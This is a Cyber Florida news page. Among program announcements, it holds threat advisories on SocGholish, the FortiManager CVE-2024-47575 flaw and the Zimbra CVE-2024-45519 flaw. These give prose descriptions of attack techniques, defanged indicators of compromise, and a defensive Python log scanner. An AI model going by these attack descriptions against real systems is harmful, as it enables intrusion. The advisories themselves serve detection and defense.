News

September 9, 2021

phaseZERO: Innovation Incubator Announced


Cyber Florida at USF Announces phaseZERO: Innovation Incubator to Boost Cybersecurity Innovation in Florida

December 2, 2024—Tampa, Fla—Cyber Florida at USF is proud to announce the launch of phaseZERO: Innovation Incubator, an innovative seed fund initiative designed to support Florida-based researchers and emerging entrepreneurs in transforming cutting-edge cybersecurity ideas into thriving businesses. With a focus on commercializing cybersecurity innovations, strengthening critical infrastructure, and creating new opportunities, phaseZERO aims to establish Florida as a national leader in cybersecurity entrepreneurship.

Modeled after the Small Business Administration’s SBIR/STTR Phase I programs, phaseZERO addresses critical gaps in seed funding and provides expert mentorship, complementing existing statewide efforts like the Florida High-Tech Corridor, I-Corps, and local incubators and accelerators.

“This program is about removing barriers for innovators,” said Dr. Manish Agrawal, academic director at Cyber Florida and professor at USF. “By providing funding and mentorship without taking equity, we’re enabling Florida’s entrepreneurs to focus on what matters most: building solutions that strengthen our cybersecurity resilience.”

Program Highlights

For this round of funding, phaseZERO will award up to $60,000 each to up to four emerging Florida companies (not to exceed $240,000 total) selected through a rigorous, three-stage evaluation process:

  • Stage 1: Applicants submit a completed application and a brief business plan for technical and business evaluation by a Cyber Florida Entrepreneur-in-Residence (EIR).
  • Stage 2: Selected applicants pitch their plans to an evaluation panel during a virtual event.
  • Stage 3: The evaluation panel selects awardees who receive funding in installments while working with an EIR to establish their business, secure further funding, and prepare for operations.

Funded companies gain access to Cyber Florida’s expansive network of state innovation ecosystem partners, including universities, accelerators, and industry leaders.

Timeline

  • Application Launch: December 2, 2024
  • Application Deadline: January 3, 2025
  • Pitch Event Invitations: January 10, 2025
  • Pitch Event: January 24, 2025

Through phaseZERO, Cyber Florida continues its mission to foster research partnerships, attract cybersecurity companies to Florida, and enable the creation of new ventures.

For more information about phaseZERO, application details, and how to get involved, visit cyberflorida.org/phasezero.

ABOUT CYBER FLORIDA AT USF
The Florida Center for Cybersecurity at the University of South Florida, commonly referred to as Cyber Florida at USF, was established by the Florida Legislature in 2014. Its mission is to position Florida as a national leader in cybersecurity through comprehensive education, cutting-edge research, and extensive outreach. Cyber Florida leads various initiatives to inspire and educate both current and future cybersecurity professionals, advance applied research, and enhance cybersecurity awareness and safety of individuals and organizations.

December 2, 2024

Teacher Spotlight: Amber Jones


Teacher: Amber Jones

School: Port St. Joe High School

County: Gulf

Amber Jones is an outstanding teacher in Gulf County, Florida. Amber is a dynamic force in cybersecurity education at Port St. Joe High School with 15 years of experience. As the technology teacher for grades 8 through 12, she brings innovation to life through her courses in digital information technology, gaming, and yearbook. Beyond the classroom, she leads as the eSports coach for both junior high and high school, inspires as the girls weightlifting coach, and guides as the senior class sponsor.

Amber’s impressive academic journey includes a degree in business information technology from Troy University and a master’s degree in educational leadership from Grand Canyon University. At home, she is a devoted mother to two wonderful daughters. Her husband plays a pivotal role at Port St. Joe High School as the athletic director and head coach for football, girls weightlifting, and softball.

Next year, Amber plans to bring her students to CyberLaunch 2025 to show off their skills and compete for some really cool prizes! We are so grateful for Amber’s contributions to both the students in Florida and the field of cybersecurity education!

Would you like to be featured in our Teacher Spotlight? To nominate yourself or another deserving teacher, complete the interest form below!

November 26, 2024

SocGholish Holds Top Spot as Leading Malware in Q3 2024

I. Targeted Entities

  • Fortune 500 Companies
  • Government Agencies

II. Introduction

According to The Multi-State Information Sharing and Analysis Center’s (MS-ISAC) monitoring services, SocGholish has retained its position as the most prevalent malware in Q3 2024, accounting for 42% of observed infections. SocGholish is a JavaScript-based downloader that spreads primarily through malicious or compromised websites that present fake browser update prompts to users. Once deployed, SocGholish infections can facilitate further exploitation by delivering additional malicious payloads.

III. Additional Background Information

SocGholish, also known as “FakeUpdates,” has emerged as the leading malware in Q3 2024. This malware has been active since 2018 and operates as a JavaScript-based downloader that exploits drive-by-download techniques to gain initial access. SocGholish primarily spreads through compromised websites, which present fake browser or software update prompts to unsuspecting users. When users download and run the updates, they execute a malicious payload that establishes communication with SocGholish’s command-and-control (C2) infrastructure.

The malware typically delivers its payload via direct download of JavaScript files or, less frequently, within obfuscated ZIP archives to evade detection. The attackers have continued to adapt, using techniques such as homoglyphs in filenames to bypass string-based detection methods. Once deployed, SocGholish conducts reconnaissance on infected systems, identifying users, endpoints, and potentially critical assets such as Active Directory domains. In about 10% of cases, the malware escalates to delivering second-stage payloads, including remote access tools (RATs) like Mythic, replacing previously popular choices like NetSupport.

SocGholish serves as an initial access broker, facilitating further exploitation by delivering additional malware, including ransomware variants such as LockBit and WastedLocker. Its activities are often precursors to larger attacks, making it a critical threat to monitor. Infections may involve domain trust enumeration and script-based data exfiltration, primarily executed in memory, complicating detection efforts. Organizations are advised to implement preventive measures, such as disabling automatic JavaScript execution, monitoring for unusual script activity, and swiftly isolating infected hosts to mitigate the impact of potential intrusions.

IV. MITRE ATT&CK

  • T1059.007 – Command and Scripting Interpreter: JavaScript
    The SocGholish payload is JavaScript, typically launched through the Windows Script Host (wscript.exe) when the user opens the downloaded file, which sidesteps detections keyed to executables.
  • T1074.001 – Data Staged: Local Data Staging
    Sends output from whoami to a local temp file (e.g., rad<5-hex-chars>.tmp) for staging prior to exfiltration.
  • T1482 – Domain Trust Discovery
    Profiles compromised systems to identify domain trust relationships for lateral movement.
  • T1189 – Drive-by Compromise
    Distributed through compromised websites with fake update prompts, using drive-by-download techniques.
  • T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
    Sends collected reconnaissance output over plain HTTP directly to the C2 domain, so the data is visible to network inspection rather than hidden in an encrypted channel.
  • T1105 – Ingress Tool Transfer
    Downloads additional malware to infected hosts to deepen compromise and persistence.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    Disguises itself as legitimate files like AutoUpdater.js to mimic real software updates.
  • T1027.013 – Obfuscated Files or Information: Encrypted/Encoded File
    Uses ZIP compression and Base-64 encoding to obfuscate JavaScript payloads and URLs.
  • T1566.002 – Phishing: Spearphishing Link
    Distributed via spear-phishing emails with links leading to compromised websites.
  • T1057 – Process Discovery
    Lists processes on targeted hosts to understand the environment.
  • T1518 – Software Discovery
    Identifies the victim’s browser to deliver the appropriate fake update page.
  • T1082 – System Information Discovery
    Collects system details, such as computer name, for context-specific targeting.
  • T1614 – System Location Discovery
    Uses IP-based geolocation to focus infections on North America, Europe, and parts of the Asia-Pacific region.
  • T1016 – System Network Configuration Discovery
    Enumerates domain name and Active Directory membership for potential privilege escalation.
  • T1033 – System Owner/User Discovery
    Uses whoami to obtain username information from compromised hosts.
  • T1204.001 – User Execution: Malicious Link
    Lures users into interacting with malicious links on compromised websites, triggering the malware.
  • T1102 – Web Service
    Uses Amazon Web Services to host second-stage servers, leveraging legitimate infrastructure.
  • T1047 – Windows Management Instrumentation (WMI)
    Employs WMI for script execution and system profiling to gather information stealthily.

V. Immediate Recommendations

  • Endpoint Detection and Response – Deploy EDR solutions to monitor and detect unusual behavior indicative of SocGholish activity, such as unexpected script execution or unauthorized C2 communications.
  • Restrict JavaScript Execution – Disable the execution of JavaScript on untrusted websites, and on endpoints prevent downloaded .js files from running by associating the .js extension with a text editor rather than Windows Script Host, since the fake-update lure ultimately depends on the user launching a downloaded script file.
  • Regular Vulnerability Patching – Patch browsers, plugins, and other software regularly to reduce the risk of drive-by-download attacks.
  • Browser Hardening – Enforce browser settings to block pop-ups and auto-downloads from untrusted sources.
  • Anomalous Traffic Detection – Use network monitoring tools to detect and alert on unusual HTTP traffic patterns that may indicate SocGholish communication.
  • User Awareness Training – Regularly train employees on the risks of fake browser update prompts and how to identify phishing attempts.
  • Incident Response Plan (IRP) – Develop and test an incident response plan specifically addressing SocGholish-related threats, ensuring it includes steps for rapid isolation and containment.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP 83[.]69[.]236[.]128
IP 88[.]119[.]169[.]108
IP 91[.]121[.]240[.]104
IP 185[.]158[.]251[.]240
IP 185[.]196[.]9[.]156
IP 193[.]233[.]140[.]136
IP 31[.]184[.]254[.]115
Domain aitcaid[.]com
Email 0qsc137p[@]justdefinition[.]com
Domain advancedsportsandspine[.]com
Domain automotivemuseumguide[.]com
Domain brow-ser-update[.]top
Domain circle[.]innovativecsportal[.]com
Domain marvin-occentus[.]net
Domain photoshop-adobe[.]shop
Domain pluralism[.]themancav[.]com
Domain scada[.]paradizeconstruction[.]com
Domain storefixturesandsupplies[.]com
Domain 1sale[.]com
Domain taxes[.]rpacx[.]com
Domain *.signing[.]unitynotarypublic[.]com
Domain *.asset[.]tradingvein[.]xyz
Domain change-land[.]com

VII. Additional OSINT Information

SocGholish operates as a JavaScript-based malware loader that initially infects victims through compromised websites, presenting them with fake browser or software update prompts. Once users click to “update,” the malware executes a JavaScript payload, connecting back to the attacker’s command and control (C2) server to deliver additional payloads.

Image 1 of SocGholish Payload Delivery

Image 2 of SocGholish Payload Delivery

Image 3 of SocGholish Payload Delivery via Fake Google Alerts

Payload details:

  • Primary Payload: The initial JavaScript script collects system and user information, which it sends back to the C2 server, enabling the attacker to assess the target for further exploitation. This reconnaissance phase helps the malware operators determine the value of the target and the appropriate secondary payloads to deploy.
  • Secondary Payloads: SocGholish deploys additional malware based on the information gathered. Historically it used the NetSupport RAT for remote access, but since 2022 it has shifted to more advanced post-exploitation frameworks:
    • Cobalt Strike: This well-known post-exploitation tool allows attackers to conduct further reconnaissance, privilege escalation, and lateral movement within networks. However, recent reports show a transition to Mythic as an alternative to Cobalt Strike.
    • Mythic: A versatile open-source command and control framework used for post-compromise operations, allowing attackers to load additional modules and control infected systems stealthily.
  • Reconnaissance and Lateral Movement: The secondary payload often includes commands for system discovery and Active Directory enumeration. Common tools used in this phase include nltest.exe for domain trust discovery and whoami for privilege reconnaissance.
  • Ransomware Associations: SocGholish has acted as an initial access broker, facilitating access for ransomware groups such as LockBit and WastedLocker. This handoff enables ransomware operators to capitalize on SocGholish’s infiltration to execute ransom demands or further network disruption.

By delivering these targeted payloads, SocGholish operators can gain persistent access, conduct extensive reconnaissance, and potentially disrupt critical systems. These payloads make SocGholish not only a potent malware threat but also a significant enabler of larger ransomware and espionage campaigns across various industries.

VIII. References

The Center for Internet Security, Inc (October 23, 2024) Top 10 Malware Q3 2024 https://www.cisecurity.org/insights/blog/top-10-malware-q3-2024

Red Canary (2024) SocGholish https://redcanary.com/threat-detection-report/threats/socgholish/

MITRE ATT&CK (March 22, 2024) SocGholish https://attack.mitre.org/software/S1124/

Blackpoint Cyber (June 21, 2024) AsyncRAT, NetSupport RAT, and VssAdmin Abuse for Shadow Copy Deletion https://blackpointcyber.com/resources/blog/asyncrat-netsupportrat-vssadmin-abuse-for-shadow-copy-deletion-soc-incidents-blackpoint-apg/

Proofpoint (November 22, 2022) Part 1: SocGholish, a very real threat from a very fake update https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update

ReliaQuest (January 30, 2023) SocGholish: A Tale of FakeUpdates https://www.reliaquest.com/blog/socgholish-fakeupdates/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker.

November 25, 2024

Red Dragon Rising II: China in Cyberspace

Join us as we once again convene some of the world’s leading scholars to discuss China’s power projection through cyberspace. Since this group last convened, the world has seen an explosion in the availability and use of artificial intelligence (AI) as well as an extension of the digital attack surface. Some questions they’ll ponder include: How might an AI capability enhance China’s security? What is China’s current cyberspace strategy and how might it be augmented by AI? Will AI make China more effective with cyber-enabled information operations, cyber espionage, and offensive cyber? How might China’s terrestrial ambitions be reflected in cyberspace? Don’t miss this opportunity to hear some of the top experts discuss cyberspace, China, and national security!

Moderator: Dr. Mark Grzegorzewski

Panelists:

November 22, 2024 (updated January 6, 2025)

Cyber Florida at USF’s SOCAP Builds Cyber Talent Pipeline


Cyber Florida at USF’s Security Operations and Cybersecurity Apprenticeship Program (SOCAP) employs up to 10 students each semester, with opportunities for students to remain in the program for multiple terms. Through this innovative program, SOCAP interns gain hands-on experience addressing real cybersecurity issues for various clients, effectively extending the capabilities of client IT teams.

Managed by Ryan Irving and Duy Dao, SOCAP gives students valuable exposure to the day-to-day operations of a security operations center. Leveraging tools like Microsoft Defender, CrowdStrike, Stamus Networks, MS-ISAC Albert, Recorded Future, Magnet Forensics, Belkasoft Forensics, Volexity, and more, Irving assigns work tickets—real security alerts or issues—that need investigation. Each day, students select or are assigned tickets from the system, allowing them to work on current cybersecurity tasks and engage in practical problem-solving.

The University of South Florida (USF) Information Technology (IT) Department is among the clients benefiting significantly from SOCAP’s services. “The SOCAP partnership with USF IT is fantastic,” says Irving. “Students aren’t just performing real cybersecurity tasks; they’re actively improving the security of the university’s IT infrastructure while honing their skills in a real-world environment.”

In addition to ticket-based troubleshooting, SOCAP students take on proactive threat-hunting roles, scouring resources to detect potential indicators of compromise and preparing threat advisories for Cyber Florida’s threat room page on its website.

SOCAP students like Alessandro Lovadina, Erika Delvalle, and Ben Price bring diverse skills and interests, creating a collaborative team environment.

Lovadina is passionate about coding projects, like building web applications. “With AI, cybersecurity is crucial; all students should learn the basics of cybersecurity,” he notes.

Delvalle finds excitement in threat-hunting tickets. “It never gets boring,” she says. “You’re always learning something new.”

Price enjoys challenging issues that expand his research skills and expertise. “It’s fulfilling; it’s important,” he says.

SOCAP students have the freedom to conduct their own research and troubleshoot using open-source information and reliable online resources. The program’s hybrid format allows students to work both in-office and remotely, providing a dynamic environment that complements their class schedules. This flexibility gives SOCAP interns a comprehensive view of security operations and invaluable career experience.

Irving also incorporates regular training exercises in collaboration with the USF IT team. “Monthly simulated events allow students and staff to practice incident response skills together,” he says. “We invite USF IT to join these sessions, so that we can learn and improve our response capabilities as a team.”

Dennis Guillette, Director and Security Architect of USF IT, expressed his appreciation for SOCAP students’ contributions to the university’s cybersecurity efforts. “I would like to extend my deepest gratitude to the SOCAP students for their outstanding hard work and dedication. Their impressive technical knowledge and exceptional troubleshooting skills have been invaluable to our security posture. Their commitment to excellence and ability to tackle complex security challenges have significantly strengthened us. Thank you for setting a high standard of professionalism and expertise.”

Cyber Florida’s SOCAP internship program at USF continues to be a valuable resource for students and the university alike, advancing cybersecurity skills and bolstering the state’s defenses. It serves as a model for other schools.

November 22, 2024

Critical Vulnerability in Fortinet FortiManager Under Active Exploitation

I. Targeted Entities

  • Fortinet FortiManager Customers
  • Managed Service Providers

II. Introduction

A critical vulnerability has been identified in Fortinet’s FortiManager platform, a centralized management solution for Fortinet security products. This vulnerability, tracked as CVE-2024-47575, allows an unauthenticated remote attacker to execute arbitrary code or commands via specially crafted requests. Exploitation is currently active in the wild, posing a significant threat to affected organizations. If successfully exploited, attackers could gain access to critical systems, install malicious programs, and manipulate sensitive data. Fortinet and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued advisories urging organizations to take immediate action by applying the latest patches to mitigate risks.

FortiManager is widely deployed across sectors, including government, telecommunications, financial services, and healthcare, making this vulnerability particularly concerning. Given the increasing sophistication of cyberattacks, unpatched systems present a high risk, allowing attackers to potentially escalate privileges and compromise network infrastructures.

III. Additional Background Information

In October 2024, Fortinet disclosed a critical vulnerability in FortiManager, a network management solution widely used to centrally configure and monitor Fortinet devices. This vulnerability, tracked as CVE-2024-47575, stems from missing authentication for a critical function in the fgfmd daemon, the service behind the FGFM protocol (TCP port 541) that FortiGate devices use to register with and communicate with FortiManager. An attacker who can reach that service can execute arbitrary code remotely without valid credentials. Fortinet and CISA have confirmed that malicious actors are actively targeting both on-premises and cloud-based instances of FortiManager through specially crafted requests, leveraging this flaw to compromise network environments.

The exploit is aligned with tactics defined in the MITRE ATT&CK framework, specifically T1190 – Exploit Public-Facing Application, indicating that adversaries are using exposed FortiManager instances as initial access points. Once inside, attackers can install backdoors, modify security configurations, and delete or manipulate data, depending on the privileges of the compromised service accounts. Higher-privileged accounts can allow attackers to escalate their control leading to significant disruptions.

Previous incidents involving vulnerabilities in network appliances highlight the severity of such attacks. FortiManager’s broad adoption across multiple critical infrastructures and industries make it an attractive target. Unpatched instances are especially vulnerable to this exploit. Additionally, this vulnerability exposes connected Fortinet devices, allowing attackers to disable firewalls or VPNs and undermine network defenses.

Organizations are strongly advised to apply the latest patches immediately, perform vulnerability assessments, and monitor for indicators of compromise (IoC). Fortinet has released mitigation guidelines, emphasizing the importance of updating software, segmenting networks, and limiting administrative access to prevent further exploitation. Failure to act could result in severe operational disruptions and data breaches, particularly for critical infrastructure providers and enterprises that rely heavily on Fortinet’s security infrastructure.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    Attackers exploit the public-facing FortiManager application via a missing authentication flaw. This vulnerability allows unauthorized attackers to execute arbitrary code on FortiManager by sending specially crafted requests, gaining initial access to the system and enabling control over FortiGate devices connected to the network.
  • T1078 – Valid Accounts
    The threat actors leverage valid certificates on unauthorized FortiManager and FortiGate devices, allowing them to register these devices on exposed FortiManager instances. By mimicking legitimate access, the attackers avoid raising immediate security alerts and maintain a low profile for further exploitation and lateral movement within the network.
  • T1036 – Masquerading
    Attackers register rogue FortiManager devices under misleading names (e.g., “localhost”) and legitimate-seeming serial numbers (e.g., FMG-VMTM23017412). This technique helps obscure threat actor activity within FortiManager logs and console, allowing the attacker’s device to appear as if it is part of the legitimate infrastructure.
  • T1041 – Exfiltration Over C2 Channel
    Exfiltration of FortiManager and FortiGate configuration files occurs over encrypted Command and Control (C2) channels, leveraging HTTPS to avoid detection by security tools. The threat actor UNC5820 has been observed using specific IP addresses to exfiltrate compressed files containing sensitive configuration information, user credentials, and device data.
  • T1587.003 – Develop Capabilities: Digital Certificates
    Attackers leverage valid digital certificates on FortiManager and FortiGate devices to masquerade malicious activities as legitimate. With these certificates, unauthorized devices can connect to FortiManager, bypassing certain security configurations and enabling persistent access to compromised networks.
  • T1562.001 – Impair Defenses: Disable or Modify Tools
    With administrative control of FortiManager, attackers can change settings that would otherwise expose them. The fgfm-deny-unknown setting, which Fortinet recommends enabling as a workaround so that devices with unknown serial numbers cannot connect over FGFM, only protects while it remains enabled; any change to it, or to device-registration settings generally, should be treated as a signal to investigate.
  • T1027 – Obfuscated Files or Information
    Attackers use gzip compression on the /tmp/.tm archive, which stores exfiltrated configuration data, to obfuscate and minimize visibility of extracted data. This technique reduces the file’s detection footprint, making it harder to identify during data exfiltration stages.
  • T1040 – Network Sniffing
    While not directly observed in this incident, the configuration data exfiltrated includes sensitive details like IPs and credentials. This could indicate an intention to use network sniffing techniques or other credential-monitoring tactics to further penetrate or maintain persistence in the target network.

V. Immediate Recommendations

  • Install Security Updates:
    • Fortinet has released fixed FortiManager versions for CVE-2024-47575. To close the flaw and reduce the risk from active exploitation, organizations should give top priority to installing these updates on all FortiManager instances, on-premises and cloud-based alike. Where patching must wait, Fortinet’s advisory also documents workarounds, including enabling fgfm-deny-unknown so that unregistered devices cannot connect, and restricting which source IPs may reach the FGFM service with a local-in policy.
  • Monitor for Compromise Indicators (IoCs):
    • Check network traffic and system logs often for known IoCs linked to this attack, such as file paths, flagged IP addresses, MD5 hash values, and log entries that might point to exploitation (see the IoCs section). To improve detection capabilities, incorporate these IoCs into your SIEM or IDS/IPS.
  • Establish an Incident Response Plan:
    • Create or revise an incident response plan that includes steps for handling FortiManager vulnerability exploitation. Make sure your reaction team is equipped and trained to deal with any possible Fortinet system breaches.
  • Isolate Compromised Systems:
    • Isolate compromised systems right away to stop additional access or harm if any indications of compromise are found. Notify the affected parties and carry out a comprehensive investigation, eliminating any malware or backdoors.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP 45.32.41[.]202
IP 195.85.114[.]78
IP 104.238.141[.]143
IP 158.247.199[.]37
IP 45.32.63[.]2
File /tmp/.tm
File /var/tmp/.tm
MD5 (unreg_devices.txt) 9DCFAB171580B52DEAE8703157012674
Email address 0qsc137p[@]justdefinition[.]com
Log entry type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" changes="Unregistered device localhost add succeeded"
Log entry type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"
String in /log/locallog/elog msg="Unregistered device localhost add succeeded"
String in /log/locallog/elog changes="Edited device settings (SN FMG-VMTM23017412)"
String in /log/locallog/elog changes="Added unregistered device to unregistered table."
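The local log entries in the table above are key=value records in which FortiManager mixes comma and space separators and quotes values that themselves contain commas, so a naive split on either character mangles them. The following is an added example written for this advisory, not Fortinet's or Mandiant's code: it parses such lines field by field and matches them against the indicators listed here (the two unregistered-device messages, the rogue serial number, the "localhost" device name, and the IP addresses). Lines 1 and 2 of the sample reproduce the page's log entries; lines 3 and 4 are constructed for the example, and the serial, host name, user and 10.x address in them are invented.

```python
import re

# Indicators from this advisory's IoC table (written undefanged so they can be compared).
IOC_IPS = {"45.32.41.202", "195.85.114.78", "104.238.141.143", "158.247.199.37", "45.32.63.2"}
IOC_SERIAL = "FMG-VMTM23017412"
IOC_MESSAGES = (
    "Unregistered device localhost add succeeded",
    "Added unregistered device to unregistered table",
)

# key=value tokens: a quoted value is consumed whole (it may contain commas and spaces);
# an unquoted value ends at the next space or comma.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]*))')
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_fmg_entry(line):
    """Turns one FortiManager local log line into a dict of fields."""
    return {key: (quoted or bare) for key, quoted, bare in KV.findall(line)}


def check_fmg_entry(line):
    """Returns the list of IoC conditions an entry satisfies (empty if none)."""
    entry = parse_fmg_entry(line)
    hits = []
    text = entry.get("msg", "") + " " + entry.get("changes", "")
    if any(m in text for m in IOC_MESSAGES):
        hits.append("unregistered-device-add")
    if IOC_SERIAL in text:
        hits.append("rogue-serial")
    if "localhost" in (entry.get("device"), entry.get("performed_on")):
        hits.append("localhost-device")
    # IPs can appear in several fields (userfrom, msg, ...), so scan the whole line.
    for ip in sorted(set(IPV4.findall(line)) & IOC_IPS):
        hits.append("ioc-ip:" + ip)
    return hits


def scan_fmg_log(lines):
    """Returns [(line_number, hits)] for lines that match at least one IoC."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = check_fmg_entry(line)
        if hits:
            results.append((number, hits))
    return results


# Lines 1-2: the log entries from the IoC table. Lines 3-4: constructed for this example.
SAMPLE_LOG = [
    'type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",'
    'user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" '
    'adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" '
    'changes="Unregistered device localhost add succeeded"',
    'type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",'
    'user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" '
    'performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"',
    'type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",'
    'user="admin",userfrom="jsonrpc(10.20.30.40)",msg="" adom="root" session_id=77 '
    'operation="Modify device" performed_on="fw-branch-01" '
    'changes="Edited device settings (SN FGVMEV0000000001)"',
    'type=event,subtype=system,pri=information,user="admin",userfrom="ssh(45.32.41.202)",'
    'msg="Administrator admin logged in successfully from ssh(45.32.41.202)"',
]

if __name__ == "__main__":
    for number, hits in scan_fmg_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Run it against an export of /log/locallog/elog (one entry per line) rather than the embedded sample; the "localhost-device" condition on its own is a weak signal and is included so that the rogue device registration described in the MITRE section stands out even when the exact message text differs between FortiManager versions.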

VII. References

The Channel Company, CRN (October 24, 2024) 5 Things To Know On The Fortinet FortiManager Attacks https://www.crn.com/news/security/2024/5-things-to-know-on-the-fortinet-fortimanager-attacks

Bleeping Computer (October 23, 2024) Fortinet warns of new critical FortiManager flaw used in zero-day attacks https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/

Google Cloud (October 23, 2024) Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575) https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575

New York State (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://its.ny.gov/2024-120

Bleeping Computer (October 24, 2024) Mandiant says new Fortinet flaw has been exploited since June https://www.bleepingcomputer.com/news/security/mandiant-says-new-fortinet-fortimanager-flaw-has-been-exploited-since-june/

CVE (October 23, 2024) CVE-2024-47575 https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2024-47575

FortiGuard (October 17, 2024) Missing authentication in fgfmsd https://www.fortiguard.com/psirt/FG-IR-24-423

MS-ISAC (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://learn.cisecurity.org/webmail/799323/2307481671/eb748002d95238b2d31f1dc45b527f271478b2fb5b4d5ee93eb20f05d2825fce

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker. 

November 12, 2024

Belonging in a Changing Cyber World: Community, Careers, and Resilience

November 7, 2024

The McCrary Institute: Securing America’s Digital Future

WASHINGTON, Oct. 22, 2024 /PRNewswire/ — Today, Auburn University’s McCrary Institute for Cyber and Critical Infrastructure Security—a Cyber Florida at USF partner organization—and the Cyberspace Solarium Commission 2.0 released a timely report entitled “Securing America’s Digital Future: A Bipartisan Cybersecurity Roadmap for the Next Administration.” The report includes dozens of recommendations for improving the cybersecurity of the United States, based on input from the task force’s subject matter experts. The task force that developed the report consisted of thought leaders in the field of cyber policy, including industry experts and former federal officials. Among those who contributed to the report was Cyber Florida at USF Director Ernie Ferraresso, who is also a Senior Fellow at the McCrary Institute.


“With the release of this important report, we are offering the next administration a set of sound policy recommendations to further improve national security in the face of growing cybersecurity threats,” said Frank Cilluffo, director of the McCrary Institute. “Thanks to the tireless efforts of our distinguished panel of experts, these recommendations come at a critical time in the cyber policy arena, and we look forward to engaging the next administration to advance these proposals.”

Mark Montgomery, Executive Director of the Cyberspace Solarium Commission 2.0, added, “The cyber threats to U.S. critical infrastructure emanating from both state and non-state adversaries continue to evolve and grow, and so must our policy approach to mitigating them. I am pleased that this impressive cohort of subject matter experts came together with actionable recommendations to address some of the most pressing policy questions facing government and industry today.”

The task force recommendations include calls to harmonize a cumbersome regulatory landscape; improve coordination across federal agencies; provide exercised playbooks for stakeholders to prepare for and respond to cyber attacks; develop a process for labeling state sponsors of cybercrime; develop a system for critical asset identification; establish standards for cloud, IT, and OT security; improve cyber workforce development and retention; and resource key organizations more effectively, among many others. Irrespective of the outcome of the upcoming presidential election, these task force recommendations will provide a framework for the incoming administration to engage in important policy efforts and improve the security of U.S. critical infrastructure.

The McCrary Institute, based at Auburn University with additional centers in Washington, D.C., and Huntsville, seeks practical solutions to pressing challenges in the areas of cyber and critical infrastructure security. Through its three hubs, the institute offers end-to-end capability — policy, research and education — on all things cyber-related.

To learn more and download a copy of the report, please visit https://eng.auburn.edu/mccrary/pttf/index.

October 30, 2024

Zimbra Collaboration RCE Vulnerability

I. Targeted Entities

  • Small to Medium Government and Business Entities

II. Introduction

A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra’s postjournal service, which processes incoming emails over SMTP. It allows attackers to compromise servers by sending specially crafted emails whose CC field triggers arbitrary command execution on the server. Once exploited, the vulnerability can be used to install web shells, giving attackers full access to the compromised server and enabling further network infiltration.

III. Additional Background Information

Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    • The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
  • T1505.003 – Server Software Component: Web Shell
    • The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
  • T1059.004 – Command and Scripting Interpreter: Unix Shell
    • The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
  • T1071.001 – Application Layer Protocol: Web Protocols
    • The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
  • T1105 – Ingress Tool Transfer
    • Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
  • T1132.001 – Data Encoding: Standard Encoding
    • The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    • The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.

V. Recommendations

  • Patch Management
    • Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
  • Monitoring and Logging
